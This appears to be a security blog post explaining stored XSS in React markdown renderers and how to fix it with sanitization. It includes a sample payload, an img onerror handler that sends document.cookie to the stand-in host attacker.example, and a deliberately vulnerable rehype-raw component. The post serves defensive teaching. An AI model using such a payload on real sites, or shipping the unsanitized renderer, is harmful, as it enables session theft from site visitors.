Stored XSS in React Markdown Renderers: How Vibe-Coded Blogs Get Compromised

SecuriSky Team · April 18, 2026 · 12 min read

Introduction to Stored XSS in React Markdown Renderers

Stored XSS attacks occur when an attacker injects malicious code into a web application, the application stores it on the server, and the browser executes it whenever other users view the compromised page. In vibe-coded blogs built with tools like Cursor, Lovable, Bolt, v0, or Replit, stored XSS is particularly dangerous because generated code often wires user input straight into the renderer without review. The primary vulnerability in these cases usually lies in how user-submitted markdown is rendered.

When a user submits markdown text that includes malicious scripts, a vulnerable application may render this text without proper sanitization, leading to the execution of the malicious script. This can happen in React applications that use markdown renderers to display user-generated content. For instance, if a blog built with Replit allows users to create posts using markdown and fails to sanitize the input properly, an attacker could inject JavaScript code that steals user data or takes control of user sessions.
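To make this concrete, a stored payload can look like an ordinary comment with a raw HTML tag embedded in the markdown (the attacker URL below is made up for illustration):

```javascript
// Hypothetical stored payload submitted as a blog comment. If the application
// renders it without sanitization, the onerror handler executes in the browser
// of every reader who views the page, exfiltrating their session cookie.
const maliciousMarkdown = [
  'Great post, thanks for sharing!',
  '',
  '<img src="x" onerror="fetch(\'https://attacker.example/steal?c=\' + document.cookie)">',
].join('\n');
```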

Vulnerable Code Example

Consider a React component that renders user-supplied markdown. Note that react-markdown escapes raw HTML by default; the component below becomes vulnerable because it enables raw HTML pass-through with rehype-raw (the same risk applies to rendering markdown output via dangerouslySetInnerHTML):

```jsx
import React from 'react';
import ReactMarkdown from 'react-markdown';
import rehypeRaw from 'rehype-raw';

// Vulnerable: rehype-raw passes any raw HTML embedded in the markdown
// straight through to the DOM without sanitization.
const MarkdownRenderer = ({ text }) => {
  return <ReactMarkdown rehypePlugins={[rehypeRaw]}>{text}</ReactMarkdown>;
};

export default MarkdownRenderer;
```

In this example, if text contains an HTML payload such as an img tag with an onerror handler, the renderer passes it into the DOM and the browser executes the attacker's script for every visitor who views the stored post.

Understanding the Risk

The risk of stored XSS is not just theoretical; it's a common issue in web applications that do not properly validate and sanitize user input. For developers who rely on tools like Cursor, Lovable, Bolt, v0, or Replit to build their vibe-coded apps, understanding how to mitigate this risk is crucial. One approach is to use libraries that safely render markdown, ensuring that any potentially malicious code is escaped and cannot be executed.
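The escaping such libraries apply can be illustrated in a few lines. This is a simplified sketch of the idea, not a substitute for a maintained renderer or sanitizer:

```javascript
// Simplified sketch: convert HTML-significant characters to entities so that
// injected markup is displayed as text rather than interpreted by the browser.
// Ampersands must be escaped first to avoid double-escaping the entities.
function escapeHtml(input) {
  return input
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

console.log(escapeHtml('<script>alert(1)</script>'));
// -> &lt;script&gt;alert(1)&lt;/script&gt;
```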

Secure Rendering with DOMPurify

One effective way to sanitize user-inputted markdown and prevent stored XSS attacks is by using a library like DOMPurify. This library can be used in conjunction with markdown rendering libraries to ensure that the output is safe for rendering in the browser. Here's an example of how you might integrate DOMPurify into your markdown rendering component:

```jsx
import React from 'react';
import ReactMarkdown from 'react-markdown';
import rehypeRaw from 'rehype-raw';
import DOMPurify from 'dompurify';

// Sanitize the user-supplied markdown before handing it to the renderer,
// so any raw HTML it contains is stripped of dangerous tags and attributes.
const safeMarkdownRenderer = (text) => {
  const cleanText = DOMPurify.sanitize(text);
  return <ReactMarkdown rehypePlugins={[rehypeRaw]}>{cleanText}</ReactMarkdown>;
};

const MarkdownRenderer = ({ text }) => {
  return safeMarkdownRenderer(text);
};

export default MarkdownRenderer;
```

However, simply sanitizing the input is not enough; the rendering of the markdown itself must not reintroduce vulnerabilities. Some markdown libraries have options to escape or sanitize their output, and these should be enabled: react-markdown, for example, escapes raw HTML unless rehype-raw is explicitly added, and rehype-sanitize can filter the rendered element tree against an allowlist.
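One gap worth noting: sanitizing the markdown source does nothing for payloads that contain no raw HTML at all. A markdown link such as [click me](javascript:alert(1)) passes through DOMPurify untouched, because it is plain text at that stage, and only becomes dangerous once the renderer turns it into an anchor tag. A minimal, dependency-free sketch of checking link protocols on the rendered side (isSafeHref is a hypothetical helper, not part of any library):

```javascript
// Hypothetical post-render check: allow only http(s) links.
// URL is the WHATWG URL global, available in browsers and Node.
function isSafeHref(href) {
  try {
    // Resolve relative links against the site origin (illustrative base URL)
    const url = new URL(href, 'https://example.com');
    return url.protocol === 'http:' || url.protocol === 'https:';
  } catch {
    return false; // unparseable hrefs are rejected outright
  }
}

console.log(isSafeHref('javascript:alert(1)')); // false
console.log(isSafeHref('/about'));              // true
```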

Advanced Sanitization with Custom Schemas

For more complex applications, or when dealing with specific types of user input, a custom sanitization schema might be necessary. This involves defining a set of rules that dictate what elements and attributes are allowed in the rendered markdown. For example, you might only allow certain types of links or images to be rendered, blocking any others as potentially malicious.

```python
from markdown import Markdown
from markdown.extensions import Extension
from markdown.postprocessors import Postprocessor

# Postprocessors run over the rendered HTML output. NOTE: naive string
# replacement like this is easy to bypass and is shown only to illustrate
# the hook points; prefer an allowlist sanitizer such as bleach in practice.
class LinkSanitizer(Postprocessor):
    def run(self, text):
        # Strip javascript: URLs from rendered links
        return text.replace('javascript:', '')

class ImageSanitizer(Postprocessor):
    def run(self, text):
        # Strip inline onerror handlers from rendered images
        return text.replace('onerror=', '')

# Define a custom markdown extension that registers the sanitizing postprocessors
class SanitizingExtension(Extension):
    def extendMarkdown(self, md):
        md.postprocessors.register(LinkSanitizer(md), 'link_sanitizer', 10)
        md.postprocessors.register(ImageSanitizer(md), 'image_sanitizer', 10)

# Use the custom extension
md = Markdown(extensions=[SanitizingExtension()])
safe_text = md.convert(user_input_text)
```
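In a React app, the idiomatic equivalent is to pass a custom schema to rehype-sanitize through react-markdown's rehypePlugins option. The core idea behind any such schema, an explicit allowlist of tags and attributes with everything else rejected, can be sketched without dependencies (the schema below is an illustrative assumption, not a complete policy):

```javascript
// Illustrative allowlist schema: map each permitted tag to the attributes it
// may carry. Anything not listed here is treated as potentially malicious.
const schema = {
  p: [],
  em: [],
  strong: [],
  a: ['href', 'title'],
  img: ['src', 'alt'],
};

// Returns true only if the tag is allowlisted and the attribute (if any) is
// allowlisted for that tag. hasOwnProperty guards against prototype keys.
function isAllowed(tag, attr = null) {
  const key = tag.toLowerCase();
  if (!Object.prototype.hasOwnProperty.call(schema, key)) return false;
  return attr === null || schema[key].includes(attr.toLowerCase());
}

console.log(isAllowed('script'));         // false: tag not in the schema
console.log(isAllowed('a', 'href'));      // true
console.log(isAllowed('img', 'onerror')); // false: attribute not allowlisted
```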

Conclusion

Stored XSS attacks can compromise even the most secure vibe-coded blogs if the markdown rendering is not properly sanitized. By understanding the risks and implementing secure rendering practices, such as using DOMPurify or defining custom sanitization schemas, developers can significantly reduce the vulnerability of their applications. Tools like SecuriSky can also play a crucial role in detecting these issues automatically, allowing for quicker response times to potential security threats.

Quick Fix Checklist

  • [ ] Validate all user input to prevent malicious scripts from being injected.
  • [ ] Use a library like DOMPurify to sanitize markdown text before rendering.
  • [ ] Implement custom sanitization schemas for advanced use cases.
  • [ ] Regularly audit your application's security with tools like SecuriSky to detect potential vulnerabilities.
  • [ ] Keep all dependencies, including markdown rendering libraries, up to date to ensure you have the latest security patches.